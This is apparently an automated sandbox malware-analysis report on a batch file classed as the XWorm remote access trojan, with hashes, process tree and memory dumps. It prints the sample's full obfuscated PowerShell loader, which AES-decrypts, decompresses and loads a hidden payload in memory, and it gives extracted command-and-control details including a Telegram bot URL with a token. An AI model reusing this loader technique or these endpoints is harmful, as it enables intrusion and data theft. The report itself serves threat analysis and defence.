Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    10s
  • max time network
    9s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10/03/2025, 01:38

General

  • Target

    cool.bat

  • Size

    86KB

  • MD5

    d7b72f5976a6337345c5dd8bfb2b0f50

  • SHA1

    a23c01978685db66956720dba87ac61a9ef01855

  • SHA256

    db74824e0a5ba395af91902edaa8d61106571a0cb57b71108b5d2fe012b3ad70

  • SHA512

    073c341ebb4b51548ebb838d6631c840963522be3162ae5ae73a70cfeb7d2d99415614bf3e60feffe2b7111668912e77a72becf4a51831fff42d961dd798bb42

  • SSDEEP

    1536:53jlkY2lec9Gzs6u4cKtVEUXbo/q5VSQm2yBkLKcnaNUCbYYsVyUj67oM85NisWC:53+Y2lMs6tLFboeVSpRkLJaSeyVyHEMw

Score
10/10

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/wXYjM7Vm

  • telegram

    https://api.telegram.org/bot7377184900:AAHFDX1FxXhaVcxsJ6GOid3PcOAfkgsfjas/sendMessage?chat_id=6836733049

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cool.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3764
    • C:\Users\Admin\AppData\Local\Temp\cool.bat.exe
      "cool.bat.exe" -noprofile -executionpolicy bypass -command $jDjyk = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\cool.bat').Split([Environment]::NewLine);$EiVAn = $jDjyk[$jDjyk.Length - 1];$Rgaoo = [System.Convert]::FromBase64String($EiVAn);$CrhTj = New-Object System.Security.Cryptography.AesManaged;$CrhTj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CrhTj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CrhTj.Key = [System.Convert]::FromBase64String('t1fjLII0udRtEfiWpM9W4Cbncb9MnHXMyBPbLRFkYG8=');$CrhTj.IV = [System.Convert]::FromBase64String('3gUtTPQsjtSLngJYOiHrPA==');$UrvZI = $CrhTj.CreateDecryptor();$Rgaoo = $UrvZI.TransformFinalBlock($Rgaoo, 0, $Rgaoo.Length);$UrvZI.Dispose();$CrhTj.Dispose();$FWvUX = New-Object System.IO.MemoryStream(, $Rgaoo);$dzSYh = New-Object System.IO.MemoryStream;$RHedL = New-Object System.IO.Compression.GZipStream($FWvUX, [IO.Compression.CompressionMode]::Decompress);$RHedL.CopyTo($dzSYh);$RHedL.Dispose();$FWvUX.Dispose();$dzSYh.Dispose();$Rgaoo = $dzSYh.ToArray();[System.Reflection.Assembly]::Load($Rgaoo).EntryPoint.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4584
  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3264

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

    Filesize

    23KB

    MD5

    5726af350fb53362b67f203382fd2eaa

    SHA1

    11f6367d87b92d6c13deed8bc641422d0bcea990

    SHA256

    5423fff1b9a87ffaf764d572000f10ff80994fc8662eeef2e2c55d90f03de93b

    SHA512

    db9afd3bb5a52e8412fd1c6481dcc707269a04655b2528ce2c05282e7f34768e133a393302263ee99c6432ee622f0953360f33b010d5cdb4149422154d36ece7

  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

    Filesize

    23KB

    MD5

    7dc5fb5bb2228ec1072eefcf0126378b

    SHA1

    59f3130b632b9807f0fe65d2c57c711409443292

    SHA256

    6cfe370b81a72f38259bf85a77a8fcfa315a61807eadaf7fd7536f7571c47390

    SHA512

    d0c4f4536ed141552883321e4d5ac08b3cafa507ab824b529f650121e542c66d6e0033123fb2aad255f34893d5a0e700ea676f849b7ab8cb6e752a647b726174

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqmlf33s.j03.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cool.bat.exe

    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • memory/4584-22-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-21-0x00007FFA13340000-0x00007FFA133FD000-memory.dmp

    Filesize

    756KB

  • memory/4584-16-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-17-0x000001EDD0F00000-0x000001EDD0F16000-memory.dmp

    Filesize

    88KB

  • memory/4584-19-0x000001EDD0F10000-0x000001EDD0F1A000-memory.dmp

    Filesize

    40KB

  • memory/4584-20-0x00007FFA14A20000-0x00007FFA14C29000-memory.dmp

    Filesize

    2.0MB

  • memory/4584-14-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-15-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-23-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-24-0x00007FFA12030000-0x00007FFA123A4000-memory.dmp

    Filesize

    3.5MB

  • memory/4584-25-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-26-0x00007FFA13510000-0x00007FFA135BE000-memory.dmp

    Filesize

    696KB

  • memory/4584-27-0x000001EDD1230000-0x000001EDD124A000-memory.dmp

    Filesize

    104KB

  • memory/4584-13-0x000001EDB8BE0000-0x000001EDB8C02000-memory.dmp

    Filesize

    136KB

  • memory/4584-35-0x00007FF9F3BD0000-0x00007FF9F4692000-memory.dmp

    Filesize

    10.8MB

  • memory/4584-4-0x00007FF9F3BD3000-0x00007FF9F3BD5000-memory.dmp

    Filesize

    8KB